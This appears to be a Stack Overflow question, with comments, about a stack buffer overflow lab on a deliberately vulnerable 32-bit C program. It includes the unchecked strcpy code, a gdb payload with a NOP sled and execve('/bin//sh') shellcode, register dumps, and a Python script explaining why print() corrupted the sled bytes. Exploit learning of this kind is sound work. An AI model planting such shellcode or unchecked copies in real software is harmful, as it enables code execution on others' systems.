
For a few days I've been working on a C buffer overflow on my WSL Ubuntu. My vulnerable code is:

#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: strcpy() copies argv[1] into a fixed 100-byte
 * stack buffer with no length check, so a longer argument overwrites the
 * saved ebp and the saved return address that sit above it. */
void overflow_me(char* dizi){
    char buff_array[100];
    strcpy(buff_array,dizi);          /* no bounds check */
    printf("Hosgeldin %s",buff_array); /* "Welcome %s" */
}

int main(int argc, char *argv[]){
    overflow_me(argv[1]);             /* argv[1] is attacker-controlled input */
    return 0;
}

I compiled my code with `gcc -g -o overflow overflow.c -m32 -fno-stack-protector -fno-pie -z execstack -mpreferred-stack-boundary=2`, then I tried to overflow it with gdb. I ran the command `run $(python3 -c 'print ("\x41"*100+"A"*4+"E"*4)')` in gdb, and I could overwrite the eip and ebp registers successfully:

eax            0x76                118
ecx            0x0                 0
edx            0x56557014          1448439828
ebx            0x0                 0
esp            0xffffd124          0xffffd124
ebp            0x41414141          0x41414141
esi            0xf7fb7000          -134516736
edi            0xf7fb7000          -134516736
eip            0x45454545          0x45454545
eflags         0x10286             [ PF SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

Then I tried it like `[nop-sled][shellcode][bunch of E's]`: `run $(python3 -c 'print ("\x90"*63+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"+"E"*20)')`. However, I think the NOP sled crashes something, because after this command my registers became:

eax            0xbf                191
ecx            0x0                 0
edx            0x56557014          1448439828
ebx            0x0                 0
esp            0xffffd0d4          0xffffd0d4
ebp            0x90c290c2          0x90c290c2
esi            0xf7fb7000          -134516736
edi            0xf7fb7000          -134516736
eip            0x90c290c2          0x90c290c2
eflags         0x10282             [ SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

Why can't I overwrite eip when I run it with the NOP sled, and how can I fix it?

  • Set a breakpoint earlier so you can `stepi` the ret, or examine the situation *before* that. `-z execstack` in modern toolchains and kernels only makes the stack itself executable, not all pages, but that's still sufficient because your buffer is in fact on the stack. – Peter Cordes Apr 24 '21 at 11:29
  • The high byte of your return address is `0x90`, which is *highly* suspicious. Yeah, run your python command and pipe into `hexdump -C`; you're printing 63 repeats of `c2 90`, not `90`. So it seems you're doing something wrong with Python, like perhaps letting it do some kind of UTF-8 thing. As a quick fix you could use `0x41` inc ecx as a sled instead, or google the answer to the Python question. – Peter Cordes Apr 24 '21 at 11:32
  • Exact duplicate of [outputing nop (\x90) to a file](https://stackoverflow.com/q/61207044) – Peter Cordes Apr 24 '21 at 11:38
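The `hexdump -C` check suggested in the comments can be reproduced offline. The following is an added example, not code from the question or the comments; it assumes that `python3 -c 'print(...)'` writes through a UTF-8 stdout (the default on a WSL Ubuntu with a UTF-8 locale, and since Python 3.7 even under the C/POSIX locale). It models what `print()` emits for a `str` payload versus what `sys.stdout.buffer.write()` emits for a `bytes` payload, flags the code points that get expanded, and shows how four of the emitted bytes read back as a 32-bit little-endian register value.

```python
import struct
import sys
from typing import List


def payload_via_print(text: str) -> bytes:
    """Bytes that `python3 -c 'print(text)'` writes to a UTF-8 stdout.

    print() encodes each str code point with the stdout encoding (assumed
    UTF-8 here), so code points 0x80..0xFF become two bytes (C2/C3 xx),
    and a trailing newline is appended.
    """
    return (text + "\n").encode("utf-8")


def payload_via_buffer(data: bytes) -> bytes:
    """Bytes that `sys.stdout.buffer.write(data)` emits: no encoding step,
    every byte goes out exactly as given (and no newline is added)."""
    return bytes(data)


def expanded_code_points(text: str) -> List[int]:
    """Code points in `text` that will NOT survive the str -> UTF-8 step as
    a single byte. An empty list means print() would have been harmless."""
    return sorted({ord(ch) for ch in text if ord(ch) > 0x7F})


def little_endian_u32(chunk: bytes) -> int:
    """How a 32-bit x86 register reads 4 consecutive bytes from memory."""
    return struct.unpack("<I", chunk[:4])[0]


def hexdump(data: bytes, width: int = 16) -> str:
    """Minimal `hexdump -C`-style rendering (offsets and hex bytes only)."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off : off + width]
        lines.append(f"{off:08x}  " + " ".join(f"{b:02x}" for b in chunk))
    return "\n".join(lines)


if __name__ == "__main__":
    # Constructed inputs mirroring the two attempts in the question.
    first_attempt = "\x41" * 100 + "A" * 4 + "E" * 4   # all ASCII
    sled_as_str = "\x90" * 63                           # str, not bytes

    # Attempt 1: nothing above 0x7F, so print() emits the bytes unchanged.
    print("expanded in attempt 1:", expanded_code_points(first_attempt))

    # Attempt 2: every \x90 becomes c2 90, doubling the sled length.
    out = payload_via_print(sled_as_str)
    print("expanded in attempt 2:", [hex(c) for c in expanded_code_points(sled_as_str)])
    print(hexdump(out[:16]))
    print("register would read:", hex(little_endian_u32(out)))  # 0x90c290c2

    # The fix: build a bytes object and write it to the binary stdout.
    raw = payload_via_buffer(b"\x90" * 63)
    print(hexdump(raw[:16]))
    sys.stdout.flush()
```

The `0x90c290c2` the register dump shows is exactly four of those expanded bytes (`c2 90 c2 90`) read little-endian, which is why both ebp and eip landed on the same odd value instead of in the sled. Writing the payload with `sys.stdout.buffer.write(b"...")` avoids the encoding step entirely; note also that `$(...)` command substitution strips trailing newlines and cannot pass NUL bytes through argv, independent of the Python side.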

0 Answers